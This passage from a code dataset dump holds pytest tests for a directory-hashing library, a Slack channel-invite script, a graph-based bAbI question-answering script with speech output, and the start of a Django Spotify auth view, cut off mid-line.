_get_match_spec()\n        assert ms == ['*']\n\n    def test_only_match(self):\n        ms = _get_match_spec(match=['a*', 'b*'])\n        assert ms == ['a*', 'b*']\n\n    def test_only_ignore(self):\n        ms = _get_match_spec(ignore=['a*', 'b*'])\n        assert ms == ['*', '!a*', '!b*']\n\n    def test_match_and_ignore(self):\n        ms = _get_match_spec(match=['a*'], ignore=['*.ext'])\n        assert ms == ['a*', '!*.ext']\n\n    def test_ignore_hidden(self):\n        ms = _get_match_spec(ignore_hidden=True)\n        assert ms == ['*', '!.*', '!.*/']\n\n        # should not duplicate if present in (general) ignore\n        ms = _get_match_spec(ignore=['.*'], ignore_hidden=True)\n        assert ms == ['*', '!.*', '!.*/']\n\n        ms = _get_match_spec(ignore=['.*/'], ignore_hidden=True)\n        assert ms == ['*', '!.*/', '!.*']\n\n        ms = _get_match_spec(ignore=['.*', '.*/'], ignore_hidden=True)\n        assert ms == ['*', '!.*', '!.*/']\n\n    def test_ignore_extensions(self):\n        ms = _get_match_spec(ignore_extensions=['.ext'])\n        assert ms == ['*', '!*.ext']\n\n        # automatically adds '.'\n        ms = _get_match_spec(ignore_extensions=['ext'])\n        assert ms == ['*', '!*.ext']\n\n        # mixed also works\n        ms = _get_match_spec(ignore_extensions=['ext1', '.ext2'])\n        assert ms == ['*', '!*.ext1', '!*.ext2']\n\n        # should not duplicate if present in (general) ignore\n        ms = _get_match_spec(ignore=['*.ext'], ignore_extensions=['.ext'])\n        assert ms == ['*', '!*.ext']\n\n        ms = _get_match_spec(ignore=['*.ext'], ignore_extensions=['ext'])\n        assert ms == ['*', '!*.ext']\n\n\nclass TempDirTest(object):\n\n    def setup(self):\n        self.dir = tempfile.mkdtemp()\n\n    def teardown(self):\n        if os.path.exists(self.dir):\n            shutil.rmtree(self.dir)\n\n    def path_to(self, relpath):\n        return os.path.join(self.dir, relpath)\n\n    def mkdirs(self, dirpath):\n        os.makedirs(self.path_to(dirpath))\n\n    def mkfile(self, relpath, content=None):\n        with open(self.path_to(relpath), 'w') as f:\n            if content:\n                f.write(content)\n\n    def symlink(self, src, dst):\n        os.symlink(self.path_to(src), self.path_to(dst))\n\n    def remove(self, relpath):\n        if os.path.isdir(self.path_to(relpath)):\n            shutil.rmtree(self.path_to(relpath))\n        else:\n            os.remove(self.path_to(relpath))\n\n\nclass TestGetIncludedPaths(TempDirTest):\n    # Integration tests with `pathspec` for basic use cases.\n\n    def test_basic(self):\n        self.mkdirs('root/d1/d11')\n        self.mkdirs('root/d2')\n\n        self.mkfile('root/f1')\n        self.mkfile('root/d1/f1')\n        self.mkfile('root/d1/d11/f1')\n        self.mkfile('root/d2/f1')\n\n        expected_filepaths = ['d1/d11/f1', 'd1/f1', 'd2/f1', 'f1']\n        filepaths = get_included_paths(self.path_to('root'))\n        assert filepaths == expected_filepaths\n\n        # end with '/' or not should not matter\n        filepaths = get_included_paths(self.path_to('root/'))\n        assert filepaths == expected_filepaths\n\n    def test_not_a_directory(self):\n        self.mkdirs('root')\n        self.mkfile('root/f1')\n        # does not exist\n        with pytest.raises(ValueError):\n            get_included_paths(self.path_to('wrong_root'))\n        with pytest.raises(ValueError):\n            get_included_paths(self.path_to('root/f1'))\n\n    def test_symlinked_file(self):\n        self.mkdirs('root')\n        self.mkfile('root/f1')\n        self.mkfile('linked_file')\n        self.symlink('linked_file', 'root/f2')\n\n        # NOTE `follow_links` has no effect if only the file is linked (as is the\n        # case here); linked _files_ are always included.\n        filepaths = get_included_paths(self.path_to('root'), follow_links=False)\n        assert filepaths == ['f1', 'f2']\n\n        filepaths = get_included_paths(self.path_to('root'), follow_links=True)\n        assert filepaths == ['f1', 'f2']\n\n    def test_symlinked_dir(self):\n        self.mkdirs('root')\n        
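# Fixture: one real file inside 'root' plus a directory symlinked into it,\n        # so the follow_links flag below controls whether the linked dir's files\n        # are listed.\n        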
self.mkfile('root/f1')\n self.mkdirs('linked_dir')\n self.mkfile('linked_dir/f1')\n self.mkfile('linked_dir/f2')\n self.symlink('linked_dir', 'root/d1')\n\n filepaths = get_included_paths(self.path_to('root'), follow_links=False)\n assert filepaths == ['f1']\n\n filepaths = get_included_paths(self.path_to('root'), follow_links=True)\n assert filepaths == ['d1/f1', 'd1/f2', 'f1']\n\n # default is `follow_links=True`\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['d1/f1', 'd1/f2', 'f1']\n\n def test_raise_on_infinite_recursion(self):\n self.mkdirs('root/d1')\n self.symlink('root', 'root/d1/link_back')\n with pytest.raises(RecursionError) as exc_info:\n get_included_paths(self.path_to('root'), follow_links=True)\n assert exc_info.value.real_path == os.path.realpath(self.path_to('root'))\n assert exc_info.value.first_path == self.path_to('root/')\n assert exc_info.value.second_path == self.path_to('root/d1/link_back')\n assert str(exc_info.value).startswith('Symlink recursion:')\n\n def test_ignore_hidden_files(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n self.mkfile('root/f1')\n self.mkfile('root/.f2')\n self.mkfile('root/d1/f1')\n self.mkfile('root/d1/.f2')\n self.mkfile('root/.d2/f1')\n\n # no ignore\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['.d2/f1', '.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n # with ignore\n filepaths = get_included_paths(self.path_to('root'), match=['*', '!.*'])\n assert filepaths == ['.d2/f1', 'd1/f1', 'f1']\n\n def test_exclude_hidden_dirs(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n self.mkfile('root/f1')\n self.mkfile('root/.f2')\n self.mkfile('root/d1/f1')\n self.mkfile('root/d1/.f2')\n self.mkfile('root/.d2/f1')\n\n # no ignore\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['.d2/f1', '.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n # with ignore\n filepaths = get_included_paths(self.path_to('root'), match=['*', '!.*/'])\n assert filepaths == ['.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n def test_exclude_hidden_dirs_and_files(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n self.mkfile('root/f1')\n self.mkfile('root/.f2')\n self.mkfile('root/d1/f1')\n self.mkfile('root/d1/.f2')\n self.mkfile('root/.d2/f1')\n\n # no ignore\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['.d2/f1', '.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n # using ignore\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*/', '!.*']\n )\n assert filepaths == ['d1/f1', 'f1']\n\n def test_exclude_extensions(self):\n self.mkdirs('root/d1')\n\n self.mkfile('root/f')\n self.mkfile('root/f.txt')\n self.mkfile('root/f.skip1')\n self.mkfile('root/fskip1')\n self.mkfile('root/f.skip2')\n self.mkfile('root/f.skip1.txt')\n self.mkfile('root/f.skip1.skip2')\n self.mkfile('root/f.skip1skip2')\n self.mkfile('root/d1/f.txt')\n self.mkfile('root/d1/f.skip1')\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!*.skip1', '!*.skip2']\n )\n assert filepaths == [\n 'd1/f.txt', 'f', 'f.skip1.txt', 'f.skip1skip2', 'f.txt', 'fskip1']\n\n def test_empty_dirs_include_vs_exclude(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/d2')\n self.mkdirs('root/d3/d31')\n self.mkdirs('root/d4/d41')\n\n self.mkfile('root/d1/f')\n self.mkfile('root/d3/d31/f')\n\n filepaths = get_included_paths(self.path_to('root'), include_empty=False)\n assert filepaths == ['d1/f', 'd3/d31/f']\n\n # `include_empty=False` is default\n filepaths = 
get_included_paths(self.path_to('root'))\n assert filepaths == ['d1/f', 'd3/d31/f']\n\n filepaths = get_included_paths(self.path_to('root'), include_empty=True)\n assert filepaths == ['d1/f', 'd2/.', 'd3/d31/f', 'd4/d41/.']\n\n def test_empty_dirs_because_of_filter_include_vs_exclude(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/d2')\n\n self.mkfile('root/d1/f')\n self.mkfile('root/d2/.f')\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n include_empty=False\n )\n assert filepaths == ['d1/f']\n\n # `include_empty=False` is default\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n )\n assert filepaths == ['d1/f']\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n include_empty=True\n )\n assert filepaths == ['d1/f', 'd2/.']\n\n def test_empty_dir_not_included_due_to_not_match(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n include_empty=True\n )\n assert filepaths == ['d1/.']\n\n # NOTE that empty dirs are matched as is they were files (leafs!)\n # TODO better option?\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*/'],\n include_empty=True\n )\n assert filepaths == ['.d2/.', 'd1/.']\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!d1/'],\n include_empty=True\n )\n assert filepaths == ['.d2/.', 'd1/.']\n\n\ndef dirhash_mp_comp(*args, **kwargs):\n res = dirhash(*args, **kwargs)\n res_mp = dirhash(workers=2, *args, **kwargs)\n assert res == res_mp\n return res\n\n\nclass Testdirhash(TempDirTest):\n\n def test_guaranteed_algorithms(self):\n self.mkdirs('root/d1/d11')\n self.mkdirs('root/d2')\n self.mkfile('root/f1', 'a')\n self.mkfile('root/d1/f1', 'b')\n self.mkfile('root/d1/d11/f1', 'c')\n self.mkfile('root/d2/f1', 'd')\n\n for algorithm, expected_hash in [\n ('md5', '23315916fc3a935b5ed3e120a202aea4'),\n ('sha1', '6119b22d2916a4af7032802cdb95c742a217fe9f'),\n ('sha224', 'cdb3a780741c08d6c4ffc6aa0725787f6fbef3e80d81c8850215ef61'),\n ('sha256', '6fa5594ea7fb6a05fd36c152e6576522'\n 'a5f37b07c2d797f2ed96527ae18f3fe3'),\n ('sha384', '453ebd36d95e24149f184589df49f69b'\n 'f289af3e889c916cc93f0e02367f4d48'\n 'aef2593ef29f0ecdf3b6e05572e90066'),\n ('sha512', 'f52ac9eeeb5160637afa91f1f20f1a60'\n 'ce80a55ac3757f8bb9225e10edc131b4'\n '2da10497706ef4f06d36f13dae77540b'\n 'c0e5484c7f79f87a83c76ae103fff4fa')\n ]:\n hash_value = dirhash_mp_comp(self.path_to('root'), algorithm)\n assert hash_value == expected_hash\n\n def test_symlinked_file(self):\n self.mkdirs('root1')\n self.mkfile('root1/f1', 'a')\n self.mkfile('linked_file', 'b')\n self.symlink('linked_file', 'root1/f2')\n\n self.mkdirs('root2')\n self.mkfile('root2/f1', 'a')\n self.mkfile('root2/f2', 'b')\n\n root1_follow_true = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=True)\n root1_follow_false = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=False)\n root2 = dirhash_mp_comp(\n self.path_to('root2'), algorithm='md5')\n\n # NOTE `follow_links` hash no effect if only the file is linked (as is the\n # case here), linked _files_ are always included.\n assert root1_follow_false == root1_follow_true == root2\n\n def test_symlinked_dir(self):\n self.mkdirs('root1')\n self.mkfile('root1/f1', 'a')\n self.mkdirs('linked_dir')\n self.mkfile('linked_dir/f1', 'b')\n self.mkfile('linked_dir/f2', 'c')\n self.symlink('linked_dir', 'root1/d1')\n\n 
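# root2 mirrors root1 but with 'd1' as a real directory instead of a symlink,\n        # so the two hashes should agree only when links are followed.\n        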
self.mkdirs('root2')\n self.mkfile('root2/f1', 'a')\n self.mkdirs('root2/d1')\n self.mkfile('root2/d1/f1', 'b')\n self.mkfile('root2/d1/f2', 'c')\n\n root1_follow_true = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=True)\n root1_follow_false = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=False)\n root2 = dirhash_mp_comp(\n self.path_to('root2'), algorithm='md5')\n\n assert root1_follow_false != root1_follow_true\n assert root1_follow_true == root2\n\n def test_cache_used_for_symlinks(self):\n\n self.mkdirs('root/dir')\n self.mkfile('root/file', '< one chunk content')\n for i in range(10):\n self.symlink('root/file', 'root/link_{}'.format(i))\n for i in range(10):\n self.symlink('root/file', 'root/dir/link_{}'.format(i))\n start = time()\n dirhash(self.path_to('root'), algorithm=SlowHasher)\n end = time()\n elapsed = end - start\n assert elapsed < SlowHasher.wait_time * 2\n\n def test_raise_on_empty_root_without_include_empty(self):\n self.mkdirs('root')\n with pytest.raises(ValueError):\n dirhash_mp_comp(self.path_to('root'), 'sha256')\n\n def test_empty_root_include_empty(self):\n self.mkdirs('root')\n dirhash = dirhash_mp_comp(self.path_to('root'), 'sha256', include_empty=True)\n expected_dirhash = hashlib.sha256(\n _empty_dir_descriptor.encode('utf-8')\n ).hexdigest()\n assert dirhash == expected_dirhash\n\n def test_include_empty(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/d2')\n self.mkfile('root/d1/f')\n\n args = (self.path_to('root'), 'sha256')\n dirhash = dirhash_mp_comp(*args, include_empty=False)\n dirhash_empty = dirhash_mp_comp(*args, include_empty=True)\n assert dirhash != dirhash_empty\n\n def test_chunksize(self):\n self.mkdirs('root')\n self.mkfile('root/numbers.txt', str(range(1000)))\n\n hash_value = dirhash_mp_comp(self.path_to('root'), 'sha256')\n for chunk_size in [2**4, 2**8, 2**16]:\n assert (\n dirhash_mp_comp(self.path_to('root'), 'sha256', chunk_size=chunk_size) ==\n hash_value\n )\n\n def test_content_only(self):\n self.mkdirs('root1')\n self.mkfile('root1/a.txt', 'abc')\n self.mkfile('root1/b.txt', 'def')\n self.mkdirs('root2')\n self.mkfile('root2/a.txt', 'abc')\n self.mkfile('root2/c.txt', 'def')\n\n hash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256')\n hash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256')\n assert hash1 != hash2\n\n # with `content_only` hash remains the same as long as order of files is the\n # same (based on sorting of file paths)\n chash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256', content_only=True)\n chash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256', content_only=True)\n assert chash1 == chash2\n\n def test_paths_only(self):\n self.mkdirs('root1')\n self.mkfile('root1/a.txt', 'abc')\n self.mkfile('root1/b.txt', 'def')\n self.mkdirs('root2')\n self.mkfile('root2/a.txt', 'abc')\n self.mkfile('root2/b.txt', '___')\n\n hash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256')\n hash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256')\n assert hash1 != hash2\n\n chash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256', paths_only=True)\n chash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256', paths_only=True)\n assert chash1 == chash2\n\n def test_raise_on_content_only_and_paths_only(self):\n self.mkdirs('root1')\n self.mkfile('root1/a.txt', 'abc')\n dirhash_mp_comp(self.path_to('root1'), 'sha256') # ok!\n with pytest.raises(ValueError):\n dirhash_mp_comp(\n self.path_to('root1'),\n 'sha256',\n content_only=True,\n paths_only=True\n )\n\n def 
test_collision_attempt(self):\n self.mkdirs('root1')\n self.mkfile('root1/ab')\n self.mkfile('root1/c')\n hash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256')\n\n self.mkdirs('root2')\n self.mkfile('root2/a')\n self.mkfile('root2/bc')\n hash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256')\n\n assert not hash1 == hash2\n\n def test_ignorefile(self):\n self.mkdirs('root1')\n self.mkdirs('root2')\n for fname in ['a', '.b', 'c.txt']:\n self.mkfile(os.path.join('root1', fname))\n self.mkfile(os.path.join('root2', fname))\n\n ignorefile = (\n '# my dirhash ignore patterns\\n'\n '.*\\n'\n )\n self.mkfile('root1/.dirhashignore', ignorefile)\n assert (\n dirhash_mp_comp(self.path_to('root1'), 'sha256') ==\n dirhash_mp_comp(self.path_to('root2'), 'sha256', ignore=['.*'])\n )\n assert (\n dirhash_mp_comp(self.path_to('root1'), 'sha256', ignore=['*.txt']) ==\n dirhash_mp_comp(self.path_to('root2'), 'sha256', ignore=['.*', '*.txt'])\n )\n # ignore file should _not_ be ignored by default:\n self.mkfile('root1/.dirhashignore', '# empty ignorefile')\n assert (\n dirhash_mp_comp(self.path_to('root1'), 'sha256') !=\n dirhash_mp_comp(self.path_to('root2'), 'sha256')\n )\n\n def test_multiproc_speedup(self):\n\n self.mkdirs('root/dir')\n num_files = 10\n for i in range(num_files):\n self.mkfile('root/file_{}'.format(i), '< one chunk content')\n\n expected_min_elapsed = SlowHasher.wait_time * num_files\n\n start = time()\n dirhash(self.path_to('root'), algorithm=SlowHasher)\n end = time()\n elapsed_sequential = end - start\n assert elapsed_sequential > expected_min_elapsed\n\n start = time()\n dirhash(self.path_to('root'), algorithm=SlowHasher, workers=num_files)\n end = time()\n elapsed_muliproc = end - start\n assert elapsed_muliproc < expected_min_elapsed / 2 # at least half!\n\n\nclass SlowHasher(object):\n wait_time = 0.1\n\n def __init__(self, *args, **kwargs):\n pass\n\n def update(self, data):\n if data != b'':\n sleep(self.wait_time)\n\n def hexdigest(self):\n return ''\n","sub_path":"tests/test_dirhash.py","file_name":"test_dirhash.py","file_ext":"py","file_size_in_byte":21124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"177963723","text":"#######################\n# Slack Tools\n# Invite all users from comma separated OLD_CHANNEL_IDS to comma separated NEW_CHANNEL_IDS\n# Preface a channel with p if it's a private channel, since these require different API methods\n# Written by Payam Azadi December 2019\n#######################\nimport os\nimport slack\nimport requests\nimport time\nfrom pprint import pprint\n\nSLACK_API_TOKEN = os.environ['SLACK_API_TOKEN'] # get one from https://api.slack.com/docs/oauth-test-tokens\nNEW_CHANNEL_IDS=\"C013JH95C77\"\nOLD_CHANNEL_IDS=\"CESJXA4MT\"\n\nclient = slack.WebClient(token=os.environ['SLACK_API_TOKEN'])\n\ndef inviteUsers(channel):\n\tif channel.startswith(\"p\"):\n\t\tchannel_info = client.conversations_members(channel=channel[1:], limit=200)\n\telse:\n\t\tchannel_info = client.channels_info(channel=channel,limit=200)[\"channel\"]\n\t\n\tfor member in channel_info[\"members\"]:\n\t\tfor newChannel in NEW_CHANNEL_IDS.split(\",\"):\n\t\t\tif(newChannel.startswith(\"p\")):\n\t\t\t\tresponse = requests.post('https://slack.com/api/conversations.invite?token=%s&users=%s&channel=%s' % (SLACK_API_TOKEN, member, newChannel[1:])).json()\n\t\t\telse:\n\t\t\t\tresponse = requests.post('https://slack.com/api/channels.invite?token=%s&user=%s&channel=%s' % (SLACK_API_TOKEN, member, 
newChannel)).json()\n\t\t\t\n\t\tpprint(response)\n\t\ttime.sleep(1)\n\nchannels = OLD_CHANNEL_IDS.split(\",\")\n\nfor channel in channels:\n\tinviteUsers(channel)\n","sub_path":"invite_users.py","file_name":"invite_users.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"619173503","text":"import networkx as nx\nimport collections\nimport json\nimport io\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport argparse, random\nfrom pycorenlp import StanfordCoreNLP\nfrom Globals import Globals\nfrom networkx.classes.function import neighbors\nfrom babiparser import BabiParser\nimport time\n# TODO: make this optional\nimport espeak\n#https://github.com/relsi/python-espeak\nfemale = espeak.ESpeak(amplitude=200, word_gap=-50, pitch=36, speed=220, voice='en-us')\nmale = espeak.ESpeak(amplitude=200, word_gap=-50, pitch=80, speed=220, voice='en-us+f4')\n\nclass ActionClassifier(object):\n\n def __init__(self, input_action, model=None):\n # Label -> set of Actions\n with open(input_action,'r') as annotatedActions:\n actions = json.load(annotatedActions)\n actionsDict = {}\n for actionClass in actions:\n actionsDict[actionClass] = set(actions[actionClass])\n self.model = model if model else actionsDict\n #{\n #'attach': set(['get', 'grab', 'pick', 'take']),\n #'detach': set(['discard', 'drop', 'leave', 'put']),\n #'transport': set(['go', 'journey', 'move', 'travel'])\n #}\n\n def classify(self, action):\n for label, terms in self.model.items():\n if action in terms:\n return label\n raise Exception(\"Haven't learnt this action : %s\" % action)\n\n def classes(self):\n return self.model.keys()\n\nclass BabiGraph(object):\n def __init__(self, interactive=False,\n save_graph=False,\n int_graph=False,\n interactive_delay = 0,\n corenlp=Globals.CORENLP_SERVER,\n input_action=\"\"):\n self.parser = BabiParser(corenlp)\n self.interactive = interactive\n self.interactive_delay = interactive_delay\n self.int_graph = int_graph\n self.subStoryFacts = {}\n self.G = nx.Graph()\n self.storyNum = 0\n self.action_clsfr = ActionClassifier(input_action)\n\n def subStoryCheck(self, fact):\n if (fact == 1):\n if self.interactive:\n print(\"*************************************************\")\n new_story = \"All right, Lets start with a new story\"\n male.say(new_story)\n print(new_story)\n self.storyNum += 1\n self.G.clear()\n self.subStoryFacts = {}\n\n def question(self, subStory):\n print(subStory)\n question = input(\"\\nPlease ask the question based on the above sub-story\"+\"\\n\")\n return question\n\n def analyzeQuestion(self, QDict):\n actorNode = QDict.get(\"POS_NNP\", \"actorNode\")\n objectLocationNode = QDict.get(\"POS_NN\", \"objectLocationNode\")\n if self.G.has_node(actorNode):\n return actorNode, True\n if self.G.has_node(objectLocationNode):\n return objectLocationNode, False\n # Not Found\n return None\n\n def getTemplateAns(self, subject, answer, ansType):\n if ansType == \"location\":\n templates = [subject + \" is in the \" + answer, subject + \" is at \" + answer ]\n index = random.randrange(len(templates))\n return templates[index]\n elif ansType == \"object\":\n templates = [subject + \" is at \" + answer, subject + \" is present in \" + answer]\n index = random.randrange(len(templates))\n return templates[index]\n else:\n return \"Something went wrong, I cant answer\"\n\n def find_recent_neighbor(self, node):\n # node exists\n if node in self.G:\n neighbors = self.G[node]\n rec_time = 
-1\n rec_neigh = None\n rec_action = None\n for neigh, edge_data in neighbors.items():\n n_time = max(edge_data.keys()) # keys has timestamp\n if n_time > rec_time:\n rec_time = n_time\n rec_neigh = neigh\n rec_action = edge_data[rec_time]\n assert rec_neigh is not None\n return rec_time, rec_action, rec_neigh\n else:\n raise Exception('%s not known' % str(node))\n\n def traverseGraph(self, node, QJsonObj, is_actor):\n # print(\"Args: \", node, QJsonObj, is_actor)\n subject = node\n reasons = {}\n if node not in self.G:\n if self.interactive:\n dont_know = \"Sorry, We are not aware of \" + node + \", Hence cant answer the question\"\n print(dont_know)\n female.say(dont_know)\n return None\n\n neigh = self.G.neighbors(node)\n oldest_mem_no = float('-inf') # oldest memory for search\n newest_mem_no = float('inf') # newest memory for search\n if not is_actor:\n # find recent actor and time\n ts, action, node = self.find_recent_neighbor(node)\n # print(\">>\", ts, action, node)\n a_type = self.action_clsfr.classify(action)\n if a_type == 'attach':\n #oldest_mem_no = ts\n pass\n elif a_type == 'detach':\n newest_mem_no = ts\n else:\n raise Exception(\"This shouldnt be happening!\")\n reasons[ts] = self.subStoryFacts[ts]\n # find recent neighbors of actor\n neigh = self.G.neighbors(node)\n\n lemmaDict = {}\n for neighborNode in neigh:\n uvEdge = (neighborNode, node)\n u = uvEdge[0]\n v = uvEdge[1]\n attributeDict = self.G.get_edge_data(u, v)\n for TS,Lemma in attributeDict.items():\n if Lemma in lemmaDict:\n lemmaDict[Lemma][TS] = neighborNode\n else:\n lemmaDict[Lemma] = {TS : neighborNode}\n\n # find location connecting edges\n location_edges = list(filter(lambda action: self.action_clsfr.classify(action) == 'transport', lemmaDict.keys()))\n candidates = {}\n for lemma in location_edges:\n edges = lemmaDict[lemma]\n for ts, node in edges.items():\n candidates[ts] = node\n timeStamps = candidates.keys()\n\n timeStamps = list(filter(lambda x: oldest_mem_no <= x <= newest_mem_no, timeStamps))\n if not timeStamps:\n print(\"ERROR: Insufficient data or wrong question\")\n return None\n if self.interactive:\n for ts in timeStamps:\n reasons[ts] = self.subStoryFacts[ts]\n recollect = \"We know that\"\n print(recollect)\n female.say(recollect)\n for i, ts in enumerate(sorted(reasons.keys())):\n if i != 0:\n print(\"and then\")\n female.say(\"and then\")\n reason = reasons[ts]\n print(\"%d %s\" % (ts, reason))\n female.say(reason)\n i += 1\n\n # print(\"Time Stamps :\", timeStamps)\n latestTimeStamp = max(timeStamps, key=int)\n answer = candidates[latestTimeStamp]\n concluded_answer = answer\n # convert answer to binary if expectation is yes no type\n if QJsonObj.get('expAnsType', '') == 'YESNO':\n answer = \"yes\" if answer == QJsonObj['POS_NN'] else \"no\"\n if self.interactive:\n print(\"Hence, we can infer that\")\n female.say(\"Hence, we can infer that\")\n template_ans = \"Dont Know\"\n if QJsonObj.get('expAnsType', '') == 'YESNO':\n respond = \"Yes\" if concluded_answer == QJsonObj['POS_NN'] else \"No\"\n person = QJsonObj.get('POS_NNP', 'SomeOne')\n location = QJsonObj.get('POS_NN', 'some where')\n if answer == \"no\":\n template_ans = respond + \", \" + person + \" is not in the \" + location\n else:\n template_ans = respond + \", \" + person + \" is in the \" + location\n else:\n subj_type = \"location\" if node == subject else \"object\"\n template_ans = self.getTemplateAns(subject, answer, subj_type)\n female.say(template_ans)\n print(template_ans)\n return (answer, QJsonObj, 
self.storyNum)\n\n def processQuestion(self, output, que):\n resultDict = {'Sentence': que}\n for sentence in output['sentences']:\n for tok in sentence['tokens']:\n originalText = tok['originalText']\n if(tok['pos'] == 'VBD' or tok['pos'] == 'VB' or tok['pos'] == 'VBG' or tok['pos'] == 'VBN'or tok['pos'] == 'VBP'or tok['pos'] == 'VBZ'):\n resultDict['POS_Verb'] = originalText\n resultDict['Lemma_Verb'] = tok['lemma']\n elif(tok['pos'] == 'NNP'):\n resultDict['POS_NNP'] = originalText\n elif(tok['pos'] == 'NN'):\n resultDict['POS_NN'] = originalText\n elif(tok['pos'] == 'WRB' or tok['pos']=='WP'):\n resultDict['WHQ'] = originalText\n return resultDict\n\n def displayGraph(self):\n if self.int_graph:\n plt.clf()\n pos = nx.spring_layout(self.G)\n nx.draw(self.G, pos, with_labels=True)\n nx.draw_networkx_edge_labels(self.G, pos)\n plt.show()\n time.sleep(self.interactive_delay)\n\n def update_story(self, ann_line):\n timestamp = ann_line['SNO']\n sentence = ann_line[\"Sentence\"]\n if self.interactive:\n print(\"\\t\\t\" + str(timestamp) + \" \" + sentence)\n male.say(sentence)\n node1 = ann_line[\"POS_NN\"]\n node2 = ann_line[\"POS_NNP\"]\n lemma = ann_line[\"Lemma_Verb\"]\n edgeAttribute = dict()\n edgeAttribute[timestamp] = lemma\n edge = (node1, node2, edgeAttribute)\n self.subStoryFacts[timestamp] = sentence\n self.G.add_node(node1) #,color='red',style='filled',fillcolor='blue',shape='square'\n self.G.add_node(node2)\n self.G.add_edge(node1, node2, edgeAttribute)\n\n def answer_question(self, ann_line):\n timestamp = ann_line[\"SNO\"]\n question = ann_line[\"Sentence\"]\n if self.interactive:\n prompt_msg = \"Do you want me to answer the question\"\n female.say(prompt_msg)\n print(question)\n female.say(question)\n choice = input(prompt_msg + \" (yes/no)\\n\")\n if choice == \"no\":\n ask_user_question = \"What other question would you like me to answer\"\n female.say(ask_user_question)\n question = input(ask_user_question + \"\\n\")\n lookup_response = \"Let me think\"\n print(lookup_response)\n female.say(lookup_response)\n annotated = self.parser.annotate(question)\n ann_line = self.processQuestion(annotated, question)\n\n #subject = ann_line[\"POS_NNP\"]\n QNode, is_actor = self.analyzeQuestion(ann_line)\n return self.traverseGraph(QNode, ann_line, is_actor)\n\n def play(self, in_file, out_file=None):\n with io.open(in_file) as data_file:\n for ann_line in map(json.loads, data_file):\n self.subStoryCheck(ann_line['SNO'])\n if ann_line[\"isFact\"]:\n self.update_story(ann_line)\n else:\n yield self.answer_question(ann_line)\n if self.interactive:\n prompt_msg = \"Do you want me to continue with some more facts\"\n male.say(prompt_msg)\n choice = input(prompt_msg + \"? 
(yes/no)\\n\")\n if choice == \"no\":\n break\n if self.interactive:\n self.displayGraph()\n\n def write_results(self, answers, out_file):\n count = 0\n with open(out_file, \"a+\") as fp:\n for ans, quest, story_num in answers:\n count += 1\n rec = \"%d\\t%s\" % (story_num, ans)\n if 'answer' in quest:\n rec += \"\\t%s\" % quest['answer']\n if 'supportingFactNos' in quest:\n rec += \"\\t%s\" % ','.join(map(str, quest['supportingFactNos']))\n fp.write(rec)\n fp.write(\"\\n\")\n print(\"Wrote %d records to %s\" % (count, out_file))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"construct graph from facts of a babi-task and answer questions\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"-i\", \"--interactive\", help=\"enable interactive user mode\", action=\"store_true\")\n parser.add_argument(\"-ig\", \"--graph\", help=\"enable interactive Graph\", action=\"store_true\")\n parser.add_argument(\"-in\", \"--input\", help=\"Input file\", default=Globals.NERTEXT_FILE)\n parser.add_argument(\"-ia\", \"--input_action\", help=\"Input file action annotated verbs\", default=Globals.ANNOTATE_ACTIONS)\n parser.add_argument(\"-o\", \"--out\", help=\"Output file\", default=Globals.RESULTS_FILE)\n\n args = parser.parse_args()\n bg = BabiGraph(args.interactive, int_graph=args.graph, input_action=args.input_action)\n results = bg.play(args.input)\n bg.write_results(results, args.out)\n","sub_path":"src/babigraph.py","file_name":"babigraph.py","file_ext":"py","file_size_in_byte":13362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"648934424","text":"from django.shortcuts import render, redirect\nfrom .secret import CLIENT_ID, CLIENT_SECRET, REDIRECT_URI\nfrom rest_framework.views import APIView\nfrom requests import Request, post\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom .util import * \nfrom api.models import Room\nfrom .models import Vote\nclass AuthURL(APIView):\n def get(self, request, format=None):\n scopes = 'user-read-playback-state user-modify-playback-state 